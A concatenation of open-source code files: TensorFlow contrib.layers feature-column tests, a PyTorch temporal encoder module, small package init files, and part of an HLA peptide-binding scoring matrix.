age = tf.contrib.layers.real_valued_column("age")
# The following RealValuedColumn has 3 dimensions.
incomes = tf.contrib.layers.real_valued_column("incomes", 3)
with tf.Graph().as_default():
features = {"age": tf.constant([[1], [1]]),
"incomes": tf.constant([[100., 200., 300.], [10., 20., 30.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country, age, incomes],
num_outputs=5))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
incomes_weights = column_to_variable[incomes][0]
sess.run(incomes_weights.assign([[0.01, 0.1, 1., 10., 100.],
[0.02, 0.2, 2., 20., 200.],
[0.03, 0.3, 3., 30., 300.]]))
self.assertAllClose(output.eval(), [[14., 140., 1400., 14000., 140000.],
[1.4, 14., 140., 1400., 14000.]])
def testBucketizedColumn(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
with tf.Graph().as_default():
# buckets 2, 3, 0
features = {"price": tf.constant([[20.], [110], [-3]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[bucket],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
sess.run(column_to_variable[bucket][0].assign(
[[0.1], [0.2], [0.3], [0.4]]))
self.assertAllClose(output.eval(), [[0.3], [0.4], [0.1]])
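The bucket ids in the `# buckets 2, 3, 0` comment above follow from the boundary semantics of `bucketized_column`; a minimal numpy sketch (illustrative, assuming `np.digitize` matches those semantics for these values):

```python
import numpy as np

# boundaries [0., 10., 100.] define 4 buckets; 20. falls in bucket 2,
# 110. in bucket 3, and -3. in bucket 0.
bucket_ids = np.digitize([20., 110., -3.], [0., 10., 100.]).tolist()
```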
def testBucketizedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
with tf.Graph().as_default():
# buckets 2, 3, 0
features = {"price": tf.constant([[20., 210], [110, 50], [-3, -30]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[3, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[bucket, country],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
# dimension = 2, bucket_size = 4, num_classes = 1
sess.run(column_to_variable[bucket][0].assign(
[[0.1], [0.2], [0.3], [0.4], [1], [2], [3], [4]]))
self.assertAllClose(output.eval(), [[0.3 + 4], [0.4 + 3], [0.1 + 1]])
def testMulticlassWithBucketizedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
with tf.Graph().as_default():
# buckets 2, 3, 0
features = {"price": tf.constant([[20., 210], [110, 50], [-3, -30]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[3, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[bucket, country],
num_outputs=5))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
# dimension = 2, bucket_size = 4, num_classes = 5
sess.run(column_to_variable[bucket][0].assign(
[[0.1, 1, 10, 100, 1000], [0.2, 2, 20, 200, 2000],
[0.3, 3, 30, 300, 3000], [0.4, 4, 40, 400, 4000],
[5, 50, 500, 5000, 50000], [6, 60, 600, 6000, 60000],
[7, 70, 700, 7000, 70000], [8, 80, 800, 8000, 80000]]))
self.assertAllClose(
output.eval(),
[[0.3 + 8, 3 + 80, 30 + 800, 300 + 8000, 3000 + 80000],
[0.4 + 7, 4 + 70, 40 + 700, 400 + 7000, 4000 + 70000],
[0.1 + 5, 1 + 50, 10 + 500, 100 + 5000, 1000 + 50000]])
def testCrossWithBucketizedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[country_price],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_price][0]
sess.run(weights.assign(weights + 0.4))
# There are two crosses each with 0.4 weight.
# score = 0.4 + 0.4
self.assertAllClose(output.eval(), [[0.8]])
def testCrossWithCrossedColumn(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
country_language_price = tf.contrib.layers.crossed_column(
set([country_language, price_bucket]),
hash_bucket_size=15)
with tf.Graph().as_default():
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_language_price],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_language_price][0]
sess.run(weights.assign(weights + 0.4))
# There are two crosses each with 0.4 weight.
# score = 0.4 + 0.4 + 0.4 + 0.4
self.assertAllClose(output.eval(), [[1.6]])
def testIntegerizedColumn(self):
product = tf.contrib.layers.sparse_column_with_integerized_feature(
"product", bucket_size=5)
with tf.Graph().as_default():
features = {"product": tf.SparseTensor(values=[0, 4, 2],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[product],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
product_weights = column_to_variable[product][0]
sess.run(product_weights.assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.1], [0.5], [0.3]])
def testIntegerizedColumnWithDenseInputTensor(self):
product = tf.contrib.layers.sparse_column_with_integerized_feature(
"product", bucket_size=5)
with tf.Graph().as_default():
features = {"product": tf.constant([[0], [4], [2]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[product],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
product_weights = column_to_variable[product][0]
sess.run(product_weights.assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.1], [0.5], [0.3]])
def testIntegerizedColumnWithDenseInputTensor2(self):
product = tf.contrib.layers.sparse_column_with_integerized_feature(
"product", bucket_size=5)
with tf.Graph().as_default():
features = {"product": tf.constant([[0, 4], [2, 3]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[product],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
product_weights = column_to_variable[product][0]
sess.run(product_weights.assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.6], [0.7]])
def testIntegerizedColumnWithInvalidId(self):
product = tf.contrib.layers.sparse_column_with_integerized_feature(
"product", bucket_size=5)
with tf.Graph().as_default():
features = {"product": tf.SparseTensor(values=[5, 4, 7],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[product],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
product_weights = column_to_variable[product][0]
sess.run(product_weights.assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.1], [0.5], [0.3]])
def testMulticlassWithOnlyBias(self):
with tf.Graph().as_default():
features = {"age": tf.constant([[10.], [20.], [30.], [40.]])}
output, _, bias = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [tf.contrib.layers.real_valued_column("age")],
num_outputs=3)
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
sess.run(bias.assign([0.1, 0.2, 0.3]))
self.assertAllClose(output.eval(), [[0.1, 0.2, 0.3], [0.1, 0.2, 0.3],
[0.1, 0.2, 0.3], [0.1, 0.2, 0.3]])
def testMulticlassWithRealValuedColumn(self):
with tf.Graph().as_default():
column = tf.contrib.layers.real_valued_column("age")
features = {"age": tf.constant([[10.], [20.], [30.], [40.]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (1, 3))
sess.run(weights.assign([[0.01, 0.03, 0.05]]))
self.assertAllClose(output.eval(), [[0.1, 0.3, 0.5], [0.2, 0.6, 1.0],
[0.3, 0.9, 1.5], [0.4, 1.2, 2.0]])
def testMulticlassWithSparseColumn(self):
with tf.Graph().as_default():
column = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "arabic", "hindi", "russian", "swahili"])
features = {
"language": tf.SparseTensor(
values=["hindi", "english", "arabic", "russian"],
indices=[[0, 0], [1, 0], [2, 0], [3, 0]],
shape=[4, 1])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (5, 3))
sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
[0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
1.1]]))
self.assertAllClose(output.eval(), [[0.3, 0.6, 0.9], [0.1, 0.4, 0.7],
[0.2, 0.5, 0.8], [0.4, 0.7, 1.0]])
def testMulticlassWithBucketizedColumn(self):
column = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 100., 500., 1000.])
with tf.Graph().as_default():
# buckets 0, 2, 1, 2
features = {"price": tf.constant([[-3], [110], [20.], [210]])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (5, 3))
sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
[0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
1.1]]))
self.assertAllClose(output.eval(), [[0.1, 0.4, 0.7], [0.3, 0.6, 0.9],
[0.2, 0.5, 0.8], [0.3, 0.6, 0.9]])
def testMulticlassWithCrossedColumn(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=2)
column = tf.contrib.layers.crossed_column(
{language, country}, hash_bucket_size=5)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(
values=["english", "spanish", "russian", "swahili"],
indices=[[0, 0], [1, 0], [2, 0], [3, 0]],
shape=[4, 1]),
"country": tf.SparseTensor(values=["US", "SV", "RU", "KE"],
indices=[[0, 0], [1, 0], [2, 0], [3, 0]],
shape=[4, 1])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (5, 3))
sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
[0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
1.1]]))
self.assertAllClose(tf.shape(output).eval(), [4, 3])
def testMulticlassWithMultivalentColumn(self):
column = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "turkish", "hindi", "russian", "swahili"])
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(
values=["hindi", "english", "turkish", "turkish", "english"],
indices=[[0, 0], [0, 1], [1, 0], [2, 0], [3, 0]],
shape=[4, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[column],
num_outputs=3))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[column][0]
self.assertEqual(weights.get_shape(), (5, 3))
sess.run(weights.assign([[0.1, 0.4, 0.7], [0.2, 0.5, 0.8],
[0.3, 0.6, 0.9], [0.4, 0.7, 1.0], [0.5, 0.8,
1.1]]))
self.assertAllClose(output.eval(), [[0.4, 1.0, 1.6], [0.2, 0.5, 0.8],
[0.2, 0.5, 0.8], [0.1, 0.4, 0.7]])
def testVariablesAddedToCollection(self):
price_bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_price = tf.contrib.layers.crossed_column(
[country, price_bucket], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"price": tf.constant([[20.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_price, price_bucket],
num_outputs=1,
weight_collections=["my_collection"])
weights = tf.get_collection("my_collection")
# 3 = bias + price_bucket + country_price
self.assertEqual(3, len(weights))
class ParseExampleTest(tf.test.TestCase):
def testParseExample(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", dimension=3),
boundaries=[0., 10., 100.])
wire_cast = tf.contrib.layers.sparse_column_with_keys(
"wire_cast", ["marlo", "omar", "stringer"])
# buckets 2, 3, 0
data = tf.train.Example(features=tf.train.Features(feature={
"price": tf.train.Feature(float_list=tf.train.FloatList(value=[20., 110,
-3])),
"wire_cast": tf.train.Feature(bytes_list=tf.train.BytesList(value=[
b"stringer", b"marlo"
])),
}))
output = tf.contrib.layers.parse_feature_columns_from_examples(
serialized=[data.SerializeToString()],
feature_columns=[bucket, wire_cast])
self.assertIn(bucket, output)
self.assertIn(wire_cast, output)
with self.test_session():
tf.initialize_all_tables().run()
self.assertAllEqual(output[bucket].eval(), [[2, 3, 0]])
self.assertAllEqual(output[wire_cast].indices.eval(), [[0, 0], [0, 1]])
self.assertAllEqual(output[wire_cast].values.eval(), [2, 0])
def testParseSequenceExample(self):
location_keys = ["east_side", "west_side", "nyc"]
embedding_dimension = 10
location = tf.contrib.layers.sparse_column_with_keys(
"location", keys=location_keys)
location_onehot = tf.contrib.layers.one_hot_column(location)
wire_cast = tf.contrib.layers.sparse_column_with_keys(
"wire_cast", ["marlo", "omar", "stringer"])
wire_cast_embedded = tf.contrib.layers.embedding_column(
wire_cast, dimension=embedding_dimension)
measurements = tf.contrib.layers.real_valued_column(
"measurements", dimension=2)
context_feature_columns = [location_onehot]
sequence_feature_columns = [wire_cast_embedded, measurements]
sequence_example = tf.train.SequenceExample(
context=tf.train.Features(feature={
"location": tf.train.Feature(
bytes_list=tf.train.BytesList(
value=[b"west_side"])),
}),
feature_lists=tf.train.FeatureLists(feature_list={
"wire_cast": tf.train.FeatureList(feature=[
tf.train.Feature(bytes_list=tf.train.BytesList(
value=[b"marlo", b"stringer"])),
tf.train.Feature(bytes_list=tf.train.BytesList(
value=[b"omar", b"stringer", b"marlo"])),
tf.train.Feature(bytes_list=tf.train.BytesList(
value=[b"marlo"])),
]),
"measurements": tf.train.FeatureList(feature=[
tf.train.Feature(float_list=tf.train.FloatList(
value=[0.2, 0.3])),
tf.train.Feature(float_list=tf.train.FloatList(
value=[0.1, 0.8])),
tf.train.Feature(float_list=tf.train.FloatList(
value=[0.5, 0.0])),
])
}))
ctx, seq = tf.contrib.layers.parse_feature_columns_from_sequence_examples(
serialized=sequence_example.SerializeToString(),
context_feature_columns=context_feature_columns,
sequence_feature_columns=sequence_feature_columns)
self.assertIn("location", ctx)
self.assertIsInstance(ctx["location"], tf.SparseTensor)
self.assertIn("wire_cast", seq)
self.assertIsInstance(seq["wire_cast"], tf.SparseTensor)
self.assertIn("measurements", seq)
self.assertIsInstance(seq["measurements"], tf.Tensor)
with self.test_session() as sess:
location_val, wire_cast_val, measurement_val = sess.run([
ctx["location"], seq["wire_cast"], seq["measurements"]])
self.assertAllEqual(location_val.indices, np.array([[0]]))
self.assertAllEqual(location_val.values, np.array([b"west_side"]))
self.assertAllEqual(location_val.shape, np.array([1]))
self.assertAllEqual(wire_cast_val.indices, np.array(
[[0, 0], [0, 1], [1, 0], [1, 1], [1, 2], [2, 0]]))
self.assertAllEqual(wire_cast_val.values, np.array(
[b"marlo", b"stringer", b"omar", b"stringer", b"marlo", b"marlo"]))
self.assertAllEqual(wire_cast_val.shape, np.array([3, 3]))
self.assertAllClose(
measurement_val, np.array([[0.2, 0.3], [0.1, 0.8], [0.5, 0.0]]))
class InferRealValuedColumnTest(tf.test.TestCase):
def testTensorInt32(self):
self.assertEqual(
tf.contrib.layers.infer_real_valued_columns(
tf.zeros(shape=[33, 4], dtype=tf.int32)),
[tf.contrib.layers.real_valued_column("", dimension=4, dtype=tf.int32)])
def testTensorInt64(self):
self.assertEqual(
tf.contrib.layers.infer_real_valued_columns(
tf.zeros(shape=[33, 4], dtype=tf.int64)),
[tf.contrib.layers.real_valued_column("", dimension=4, dtype=tf.int64)])
def testTensorFloat32(self):
self.assertEqual(
tf.contrib.layers.infer_real_valued_columns(
tf.zeros(shape=[33, 4], dtype=tf.float32)),
[tf.contrib.layers.real_valued_column(
"", dimension=4, dtype=tf.float32)])
def testTensorFloat64(self):
self.assertEqual(
tf.contrib.layers.infer_real_valued_columns(
tf.zeros(shape=[33, 4], dtype=tf.float64)),
[tf.contrib.layers.real_valued_column(
"", dimension=4, dtype=tf.float64)])
def testDictionary(self):
self.assertItemsEqual(
tf.contrib.layers.infer_real_valued_columns({
"a": tf.zeros(shape=[33, 4], dtype=tf.int32),
"b": tf.zeros(shape=[3, 2], dtype=tf.float32)
}),
[tf.contrib.layers.real_valued_column(
"a", dimension=4, dtype=tf.int32),
tf.contrib.layers.real_valued_column(
"b", dimension=2, dtype=tf.float32)])
def testNotGoodDtype(self):
with self.assertRaises(ValueError):
tf.contrib.layers.infer_real_valued_columns(
tf.constant([["a"]], dtype=tf.string))
def testSparseTensor(self):
with self.assertRaises(ValueError):
tf.contrib.layers.infer_real_valued_columns(
tf.SparseTensor(indices=[[0, 0]], values=["a"], shape=[1, 1]))
if __name__ == "__main__":
tf.test.main()
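The multiclass tests above all exercise the same contract: `weighted_sum_from_feature_columns` looks up one weight row per active feature id, sums the rows per example, and adds a bias. A library-free sketch of that contract (`weighted_sum` is a hypothetical name, not the `tf.contrib` implementation):

```python
def weighted_sum(ids_per_example, weights, bias):
    """Sum one weight row per active feature id, then add the bias vector."""
    out = []
    for ids in ids_per_example:
        row = list(bias)
        for i in ids:
            for k, w in enumerate(weights[i]):
                row[k] += w
        out.append(row)
    return out

# Weight matrix shape from the multiclass tests: 5 feature ids x 3 classes.
weights = [[0.1, 0.4, 0.7], [0.2, 0.5, 0.8], [0.3, 0.6, 0.9],
           [0.4, 0.7, 1.0], [0.5, 0.8, 1.1]]
# Example 0 is multivalent (two active ids), as in the multivalent test above.
scores = weighted_sum([[2, 0], [1], [1], [0]], weights, [0.0, 0.0, 0.0])
```

With zero bias, the multivalent example's score is simply the sum of the two looked-up rows, matching `[[0.4, 1.0, 1.6], ...]` in the test assertion.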
# --- src/repositories/__init__.py | FernandoZnga/flask-api-setup | MIT ---
from .user import UserRepository
# --- code/model/temporal_corr.py | JiwanChung/tapm | MIT ---
import torch
from torch import nn
from exp import ex
from .pretrain_aux import PretrainAuxGroupRoll
from .encoders import DeepEncoder
from .old_encoders import OldTemporalEncoderEx
class TemporalCorr(PretrainAuxGroupRoll):
# include prev, next
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before, fix_gpt_epoch):
super().__init__(transformer, tokenizer, dropout_before, fix_gpt_epoch)
for feature in self.feature_names:
dim = self.feature_dims[feature]
setattr(self, feature,
nn.Sequential(*[TemporalEncoder(dim, self.gpt_dim)]))
def _get_frame_loss(self, c, frame):
# BGLC
c = c[:, :, 2:] # remove prev and next prediction
return super()._get_frame_loss(c, frame)
class TemporalCorrEx(TemporalCorr):
# include all five
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before, fix_gpt_epoch):
super().__init__(transformer, tokenizer, dropout_before, fix_gpt_epoch)
for feature in self.feature_names:
dim = self.feature_dims[feature]
setattr(self, feature,
nn.Sequential(*[TemporalEncoderEx(dim, self.gpt_dim)]))
def _get_frame_loss(self, c, frame):
# BGLC
c = c[:, :, 4:] # remove prev and next prediction
return super()._get_frame_loss(c, frame)
class TemporalEncoder(nn.Module):
def __init__(self, in_dim, dim, Encoder=DeepEncoder):
super().__init__()
self.encoder = Encoder(in_dim, dim)
self.directions = {'prev': 1, 'next': -1}
self.empty = {'prev': 0, 'next': -1}
self.context_linear = nn.ModuleDict()
for direction in self.directions.keys():
self.context_linear[direction] = nn.Linear(dim, dim)
def forward(self, feature, h=None):
feature = self.encoder(feature)
# BGLC
# build inter-group correlation
f_prev = self.build_context(feature, 'prev')
f_next = self.build_context(feature, 'next')
feature = torch.cat((f_prev, f_next, feature), dim=-2)
return feature
def build_context(self, feature, direction='prev'):
feature = self.context_linear[direction](feature)
feature = feature.mean(dim=-2) # BGC
feature = feature.clone()
feature = feature.roll(self.directions[direction], 1)
feature[:, self.empty[direction]] = 0
return feature.unsqueeze(2)
class TemporalEncoderEx(nn.Module):
def __init__(self, in_dim, dim, Encoder=DeepEncoder):
super().__init__()
self.encoder = Encoder(in_dim, dim)
self.key_order = ['pprev', 'prev', 'next', 'nnext']
self.directions = {'prev': 1, 'next': -1, 'pprev': 2, 'nnext': -2}
self.empties = {'prev': [0], 'next': [-1], 'pprev': [0, 1], 'nnext': [-2, -1]}
self.context_linear = nn.ModuleDict()
for direction in self.directions.keys():
self.context_linear[direction] = nn.Linear(dim, dim)
def forward(self, feature, h=None):
feature = self.encoder(feature)
# BGLC
# build inter-group correlation
fs = []
for direction in self.key_order:
fs.append(self.build_context(feature, direction))
feature = torch.cat((*fs, feature), dim=-2)
return feature
def build_context(self, feature, direction='prev'):
feature = self.context_linear[direction](feature)
feature = feature.mean(dim=-2) # BGC
feature = feature.clone()
feature = feature.roll(self.directions[direction], 1)
for empty in self.empties[direction]:
size = empty + 1 if empty >= 0 else -empty
if feature.shape[1] >= size:
feature[:, empty] = 0
return feature.unsqueeze(2)
class TemporalCorrGlobal(TemporalCorrEx):
# include all five
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before, fix_gpt_epoch):
super().__init__(transformer, tokenizer, dropout_before, fix_gpt_epoch)
for feature in self.feature_names:
dim = self.feature_dims[feature]
setattr(self, feature,
nn.Sequential(*[TemporalEncoderGlobal(dim, self.gpt_dim)]))
def _get_frame_loss(self, c, frame):
# BGLC
c = c[:, :, 5:] # remove global, prev and next prediction
return super()._get_frame_loss(c, frame)
class TemporalEncoderGlobal(TemporalEncoderEx):
# class TemporalEncoderGlobal(OldTemporalEncoderEx):
def __init__(self, in_dim, dim, Encoder=DeepEncoder):
super().__init__(in_dim, dim, Encoder)
self.context_linear['global'] = nn.Linear(dim, dim)
def forward(self, feature, h=None):
feature = self.encoder(feature)
# BGLC
# build inter-group correlation
fs = [self.build_context_global(feature)]
for direction in self.key_order:
fs.append(self.build_context(feature, direction))
feature = torch.cat((*fs, feature), dim=-2)
return feature
def global_pool(self, f):
f = self.context_linear['global'](f)
return f.mean(dim=-2)
def build_context_global(self, feature):
B, G, _, C = feature.shape
feature = self.global_pool(feature) # BGC
feature = feature.mean(dim=-2) # BC
feature = feature.contiguous().view(B, 1, 1, C)
feature = feature.repeat(1, G, 1, 1)
return feature
class TemporalEncoderGlobalAR(TemporalEncoderEx):
def __init__(self, in_dim, dim, Encoder=DeepEncoder):
super().__init__(in_dim, dim, Encoder)
self.context_linear['global'] = nn.Linear(dim, dim)
def forward(self, feature, h=None):
feature = super().forward(feature)
# BGLC
# build inter-group correlation
fs = [self.build_context_global(feature)]
for direction in self.key_order:
fs.append(self.build_context(feature, direction))
feature = torch.cat((*fs, feature), dim=-2)
return feature
def global_pool(self, f):
f = self.context_linear['global'](f)
return f.mean(dim=-2)
def build_context_global(self, feature):
B, G, L, C = feature.shape
feature = self.global_pool(feature) # BGC
feature = feature.mean(dim=-2) # BC
feature = feature.contiguous().view(B, 1, 1, C)
feature = feature.repeat(1, G, 1, 1)
return feature
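`build_context` in the encoders above reduces each group's features to one vector, rolls the group axis by ±1 (or ±2), and zeroes the slots that rolled past the sequence boundary. The same shift-and-mask indexing on plain Python lists (`rolled_context` is a hypothetical stdlib sketch, not the torch code):

```python
def rolled_context(groups, shift, empty_positions):
    """Roll a sequence of pooled group vectors by `shift` positions
    (torch.roll semantics: output[i] = input[i - shift]) and zero the
    boundary slots, mimicking build_context's masking."""
    n = len(groups)
    rolled = [groups[(i - shift) % n] for i in range(n)]
    for pos in empty_positions:
        rolled[pos] = 0
    return rolled

groups = [10, 20, 30, 40]                    # one pooled value per group
prev_ctx = rolled_context(groups, 1, [0])    # 'prev': shift +1, slot 0 empty
next_ctx = rolled_context(groups, -1, [-1])  # 'next': shift -1, last slot empty
```

Group 1's "prev" context is group 0's vector, and the first/last groups receive zeros instead of wrapped-around features.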
# --- sails/ui/mmck/parameters/__init__.py | metrasynth/solar-sails | MIT ---
# Register widgets for parameter types
from . import integer
from . import keyvaluepairs
from . import pathlist
from . import string
# --- epytope/Data/pssms/tepitopepan/mat/DRB1_1601_9.py | christopher-mohr/epytope | BSD-3-Clause ---
DRB1_1601_9 = {
    0: {'A': -999.0, 'E': -999.0, 'D': -999.0, 'G': -999.0, 'F': -0.004754, 'I': -0.99525, 'H': -999.0, 'K': -999.0, 'M': -0.99525, 'L': -0.99525, 'N': -999.0, 'Q': -999.0, 'P': -999.0, 'S': -999.0, 'R': -999.0, 'T': -999.0, 'W': -0.004754, 'V': -0.99525, 'Y': -0.004754},
    1: {'A': 0.0, 'E': 0.1, 'D': -1.3, 'G': 0.5, 'F': 0.8, 'I': 1.1, 'H': 0.8, 'K': 1.1, 'M': 1.1, 'L': 1.0, 'N': 0.8, 'Q': 1.2, 'P': -0.5, 'S': -0.3, 'R': 2.2, 'T': 0.0, 'W': -0.1, 'V': 2.1, 'Y': 0.9},
    2: {'A': 0.0, 'E': -1.2, 'D': -1.3, 'G': 0.2, 'F': 0.8, 'I': 1.5, 'H': 0.2, 'K': 0.0, 'M': 1.4, 'L': 1.0, 'N': 0.5, 'Q': 0.0, 'P': 0.3, 'S': 0.2, 'R': 0.7, 'T': 0.0, 'W': 0.0, 'V': 0.5, 'Y': 0.8},
    3: {'A': 0.0, 'E': -1.08, 'D': -1.0069, 'G': -0.81907, 'F': 1.3924, 'I': 0.61947, 'H': 0.40626, 'K': -0.45215, 'M': 1.0143, 'L': 0.67657, 'N': -0.13424, 'Q': -0.53328, 'P': -0.95473, 'S': -0.50619, 'R': -0.11223, 'T': -0.48406, 'W': 0.24124, 'V': 0.17518, 'Y': 1.0306},
    4: {'A': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': 0.0, 'I': 0.0, 'H': 0.0, 'K': 0.0, 'M': 0.0, 'L': 0.0, 'N': 0.0, 'Q': 0.0, 'P': 0.0, 'S': 0.0, 'R': 0.0, 'T': 0.0, 'W': 0.0, 'V': 0.0, 'Y': 0.0},
    5: {'A': 0.0, 'E': -1.1673, 'D': -0.78085, 'G': 0.15728, 'F': -0.53944, 'I': 0.14642, 'H': -0.49905, 'K': -0.18774, 'M': -0.15186, 'L': 0.10596, 'N': 0.52871, 'Q': -0.76809, 'P': -0.070009, 'S': 0.51336, 'R': 0.75411, 'T': 0.23889, 'W': -0.60847, 'V': 0.034365, 'Y': -0.034547},
    6: {'A': 0.0, 'E': -1.8769, 'D': -2.3351, 'G': -0.56145, 'F': -0.57811, 'I': -0.19487, 'H': -0.55879, 'K': -0.57848, 'M': 0.28653, 'L': 0.34381, 'N': -0.96538, 'Q': -0.97979, 'P': -0.80863, 'S': -1.1338, 'R': -0.42801, 'T': -1.7693, 'W': -0.78282, 'V': -0.79875, 'Y': -0.72388},
